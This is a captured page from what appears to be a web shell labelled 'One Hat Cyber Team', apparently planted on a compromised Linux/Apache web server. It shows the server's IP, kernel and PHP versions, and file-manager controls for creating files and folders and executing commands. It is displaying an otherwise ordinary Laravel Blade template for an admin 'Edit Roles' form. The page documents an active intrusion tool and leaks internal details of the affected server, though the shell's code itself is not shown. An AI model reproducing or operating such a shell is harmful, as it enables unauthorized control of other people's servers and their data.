⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.162
Server IP:
147.93.29.146
Server:
Linux server.tagooz.co 5.14.0-503.15.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Nov 28 07:25:19 EST 2024 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
webstoremaker
/
www
/
storage
/
framework
/
views
/
View File Name :
228228b08125988afa8954facb93029e9736be51.php
<div class="modal fade" id="editModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLongTitle"><?php echo e(__('Edit Roles')); ?></h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="ajaxEditForm" class="" action="<?php echo e(route('admin.role.update')); ?>" method="POST"> <?php echo csrf_field(); ?> <input id="inrole_id" type="hidden" name="role_id" value=""> <div class="form-group"> <label for=""><?php echo e(__('Name')); ?> **</label> <input id="inname" class="form-control" name="name" placeholder="<?php echo e(__('Enter name')); ?>"> <p id="eerrname" class="mb-0 text-danger em"></p> </div> </form> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal"><?php echo e(__('Close')); ?></button> <button id="updateBtn" type="button" class="btn btn-primary"><?php echo e(__('Save Changes')); ?></button> </div> </div> </div> </div> <?php /**PATH /home/webstoremaker/public_html/resources/views/admin/role/edit.blade.php ENDPATH**/ ?>